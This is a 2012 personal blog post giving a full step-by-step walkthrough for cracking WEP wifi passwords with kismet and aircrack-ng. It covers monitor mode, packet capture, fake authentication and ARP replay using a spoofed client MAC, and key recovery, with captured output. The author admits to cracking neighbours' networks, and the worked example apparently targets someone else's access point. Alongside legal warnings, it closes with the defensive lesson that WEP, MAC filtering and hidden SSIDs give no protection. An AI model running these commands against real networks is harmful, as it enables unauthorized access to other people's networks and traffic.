29 October 2012

269. Your neighbours' WEP wifi and you

A few years ago when I was living in an apartment block mainly inhabited by university students I took to cracking the passwords to my neighbours' WEP 'protected' wifi networks whenever I got bored -- the cracking WEP doesn't require much either in terms of brain or brawn, so it's admittedly not much of an accomplishment.

I'm writing this based off of notes I wrote a long time ago to teach people in the lab how to do various 'interesting' things with computers. Partly because even as a chemist you need to be able to -- you encounter the odd computer with a windows password or bios password which has been forgotten with time, but which is in a critical role, e.g. controlling an expensive instrument. Also, a fair number of research groups run their own wireless networks, and a lot of group leaders are barely computer literate. My pet theory is that this explains why so many of my colleagues use Macintosh...

So here's how to deal with WEP. The legality of this isn't questionable -- it is illegal to hack OTHER people's networks in most jurisdictions.

But here's a thought -- set up your own network and crack it for fun.  Once you realise how easy it is you'll never look at WEP the same way again. You'll also understand why using a hidden SSID and MAC filtering doesn't do much to protect you.

 Also, you'll most likely realise a few things which you can do to make it a little bit more troublesome to hack a WEP network (eventually it'll fall -- as will of course WPA2, although that's often requires brute force cracking which can take anything from 1 s to millenia)

DON"T GET YOURSELF IN TROUBLE BY BREAKING THE LAW. Also, be nice to your neighbours.

Anyway, WEP.

You'll need aircrack-ng and you might want kismet.


Kismet is available in the repos
sudo apt-get install kismet

You will need to edit /etc/kismet/kismet.conf to set it up for your particular wireless card. I've got a Sabrent High-power wireless-N USB device with a nice little antenna:
Bus 002 Device 003: ID 148f:2870 Ralink Technology, Corp. RT2870 Wireless Adapter

So I put the following in my /etc/kismet/kismet.conf

source=rt73,wlan1,expt

Use kismet to snoop for WEP wifi's and then get lists of associate clients:
sudo kismet


Once you've started it, hit s to sort, and w to sort by wep/wpa. Select the network you're interested in and hit i for information and c for a list of attached clients (good to know if they have MAC based filtering). Capital Q exits.

Note that you don't really NEED kismet. It just happens to be a good tool, so if you're stuck with figuring out how to set it up, you can skip this section.

Anyway, I found an AP with a bssid of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C). The AP is using channel 1.


You do need Aircrack-ng.

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar xvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1/

Edit common.mak and change
70 CFLAGS          ?= -g -W -Wall -Werror -O3

to
70 CFLAGS          ?= -g -W -Wall -O3

Compile and install:
make
sudo make install

You might get a fair bit of errors about variables being set (e.g. ndiswrapper) but not used. No worries.


If you were using network-manager you would now turn it off:
sudo service network-manager stop

If you're using your wirless card (i.e. have it set up) there's a long list of other things which may need to be stopped:
ps aux|grep dhclient
ps aux|grep wpa_supplicant
sudo service wicd stop
sudo service avahi-daemon stop


But if you haven't configured you external USB card and you're not using network-manager you don't need to stop anything e.g. I only use my sabrent card for kismet and aircrack so I don't need to stop anything.

We need a directory to work in:


mkdir ~/airscan
cd ~/airscan



Time to set up your card in monitoring mode (wlan2 is my sabrent, wlan0 is my wicd-controlled internal laptop wifi):
sudo airmon-ng start wlan2
Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 2877 avahi-daemon 2878 avahi-daemon 4813 wpa_supplicant 4888 dhclient Process with PID 4813 (wpa_supplicant) is running on interface wlan0 Process with PID 4888 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan2 Ralink RT2870/3070 rt2800usb - [phy1] (monitor mode enabled on mon0) wlan0 Unknown iwlwifi - [phy0]
Check that there's a monX interface:
sudo ifconfig
mon0 Link encap:UNSPEC HWaddr 00-0D-0A-53-19-XX-3A-30-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:238 errors:0 dropped:238 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:16279 (15.8 KiB) TX bytes:0 (0.0 B
If you didn't use e.g. kismet above you can now scan the local environment using aireplay-ng (sudo aireplay-ng -9 mon0), although it often doesn't pick up all the networks which are accessible.


The attack

A. Anyway, using kismet we earlier found an AP with a bssid of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C) and another with 00:13:E8:8E:46:XX (Intel). The AP is using channel 1.

sudo airodump-ng -c 1 --bssid 00:1D:92:16:XX:XX -w output mon0

If you get a message about the channel being fixed, then you failed to stop something earlier (e.g. dhclient, wpa_supplicant). If all went well you'll be looking at something like this:
 
CH  1 ][ Elapsed: 0 s ][ 2012-10-28 18:37                                        BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSI
00:1D:92:16:XX:XX  -76   0       30        7    1   1  54e  WEP  WEP             

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes        00:1D:92:16:XX:XX  00:13:E8:8E:46:XX  -77    2 -12e     1        5 


Important things here:
1. Make sure you're listening to the right channel (first row)
2. The MAC addresses listed under 'STATION' are connected clients. Good to know if you want to do mac spoofing.
3. The Data column is what you will want to keep your eyes on. These are the data packets which you're after and which will help you crack the WEP password.

In theory this is all you need to do, and you could just go away for an hour or two while you're passively collecting data. In most cases, you will want to speed things up, however.

B. To do that, in a second terminal run:

sudo aireplay-ng -1 0 -a 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one
The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:13:E8:8E:46:XX 18:39:40 Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1 18:39:40 Sending Authentication Request (Open System) 18:39:42 Sending Authentication Request (Open System) 18:39:44 Sending Authentication Request (Open System) 18:39:46 Sending Authentication Request (Open System) 18:39:48 Sending Authentication Request (Open System) 18:39:48 Authentication successful 18:39:48 Sending Association Request 18:39:48 Association successful :-) (AID: 1)
and in a third terminal doing
sudo aireplay-ng -3 -b 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one
The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:13:E8:8E:46:XX 18:53:56 Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1 Saving ARP requests in replay_arp-1028-185356.cap You should also start airodump-ng to capture replies. Read 16660 packets (got 3 ARP requests and 18 ACKs), sent 7334 packets...(500 pps)
To be honest I don't know what the effect of this is like on the user whose MAC you are spoofing. I tend to stir things up for five minutes, then stop, wait ten minutes, then another five minutes, and it works quite ok. Also, sometimes you get higher data rates when you're NOT trying to push it. Each network is a little bit different.

It should also now be obvious to you that filtering your wireless based on MAC really doesn't protect your network at all -- as soon as a client connects you've give a useable MAC address away. Same goes for hidden SSIDs. Your ONLY recourse is choosing a good password and not using WEP.

C. Once you've started capturing data (see A) you can start cracking:

In a fourth terminal run the following (and leave it running -- it'll preiodically re-run when there's enough new data)
sudo aircrack-ng -b 00:1D:92:16:XX:XX output*.cap
Aircrack-ng 1.1 r1892 [01:49:20] Tested 27854 keys (got 10135 IVs) KB depth byte(vote) 0 0/ 24 6D(14592) A1(14592) D2(14592) 9E(14336) BA(14336) 26(14080) 13(13824) B4(13824) AE(13312) B2(13312) DF(13056) 1 3/ 5 93(14080) CE(13568) 4C(13312) 7E(13312) 93(13312) E6(13312) 16(13056) BB(13056) E3(13056) F0(13056) 17(12800) 2 2/ 3 67(15104) 57(13824) B8(13568) 22(13312) 4B(13312) B3(13312) EB(13312) 73(13056) 76(13056) C0(13056) D7(13056) 3 1/ 12 69(14848) 71(14592) 30(14592) 96(14080) A4(13568) 1D(13568) 35(13568) 8F(13312) B8(13056) E4(13056) 5F(13056) 4 4/ 8 63(13824) 2E(13568) E6(13568) ED(13568) 80(13312) AD(13312) C6(13312) EC(13312) 1C(12800) 21(12800) 7A(12800) KEY FOUND! [ 6D:61:67:69:63 ] (ASCII: magic ) Decrypted correctly: 100%
Typically you won't have much luck until you have 5-20k IVs. Sometimes that's quick and easy (I've cracked APs in 3-4 minutes), sometimes it's slow and cumbersome (can take hours doing passive snooping).

And that's how easy WEP is to break. Don't use it.

No comments:

Post a Comment